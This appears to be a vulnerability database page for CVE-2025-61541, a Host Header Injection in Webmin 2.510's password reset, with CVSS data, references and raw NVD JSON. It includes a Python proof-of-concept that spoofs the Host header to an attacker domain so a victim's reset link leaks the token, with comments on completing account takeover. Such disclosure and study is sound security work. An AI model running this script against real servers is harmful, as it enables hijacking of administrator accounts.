CVE-2025-61541

Description

Webmin 2.510 is vulnerable to a Host Header Injection in the password reset functionality (forgot_send.cgi). The reset link sent to users is constructed using the HTTP Host header via get_webmin_email_url(). An attacker can manipulate the Host header to inject a malicious domain into the reset email. If a victim follows the poisoned link, the attacker can intercept the reset token and gain full control of the target account.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:webmin:webmin:2.510:*:*:*:*:*:*:* - VULNERABLE

Webmin < 2.510

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61541 - Webmin Host Header Injection PoC # This PoC demonstrates how to exploit the Host Header Injection # vulnerability in Webmin 2.510's password reset functionality (forgot_send.cgi) import requests # Target Webmin server URL target_url = "https://target-webmin-server:10000" # Attacker's controlled domain to receive the reset token attacker_domain = "attacker-controlled-domain.com" # Step 1: Send password reset request with manipulated Host header headers = { "Host": attacker_domain, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Target victim's email address victim_email = "[email protected]" # Password reset endpoint reset_endpoint = "/forgot_send.cgi" # Request payload data = { "email": victim_email, "user": "admin" # target username } print(f"[*] Sending password reset request with manipulated Host header...") print(f"[*] Target: {target_url}{reset_endpoint}") print(f"[*] Spoofed Host: {attacker_domain}") print(f"[*] Victim email: {victim_email}") # Send the request with spoofed Host header response = requests.post( f"{target_url}{reset_endpoint}", headers=headers, data=data, verify=False ) print(f"[*] Response status code: {response.status_code}") if response.status_code == 200: print("[+] Password reset email sent successfully!") print("[+] The reset link in the email will point to the attacker's domain") print("[+] Waiting for victim to click the poisoned link...") print("[+] Once clicked, capture the reset token from the attacker's server logs") else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text[:200]}") # Step 2: After capturing the reset token, use it to reset the password # The reset token would be captured on the attacker's server # Example: reset_token = "abc123def456" # captured from attacker server logs # reset_url = f"{target_url}/password_reset.cgi?token={reset_token}" # Then submit new password to complete the account takeover

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61541
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61541
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61541/
[4] VulDB https://vuldb.com/cve/CVE-2025-61541
[5] http://www.webmin.com/
[6] https://github.com/bugdotexe/Vulnerability-Research/tree/main/CVE-2025-61541
[7] https://github.com/webmin/webmin

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61541", "sourceIdentifier": "[email protected]", "published": "2025-10-16T15:15:34.713", "lastModified": "2025-11-06T22:20:36.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webmin 2.510 is vulnerable to a Host Header Injection in the password reset functionality (forgot_send.cgi). The reset link sent to users is constructed using the HTTP Host header via get_webmin_email_url(). An attacker can manipulate the Host header to inject a malicious domain into the reset email. If a victim follows the poisoned link, the attacker can intercept the reset token and gain full control of the target account."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webmin:webmin:2.510:*:*:*:*:*:*:*", "matchCriteriaId": "60EA4AEE-565A-4F37-ADCD-8778FB128A81"}]}]}], "references": [{"url": "http://www.webmin.com/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bugdotexe/Vulnerability-Research/tree/main/CVE-2025-61541", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/webmin/webmin", "source": "[email protected]", "tags": ["Product"]}]}}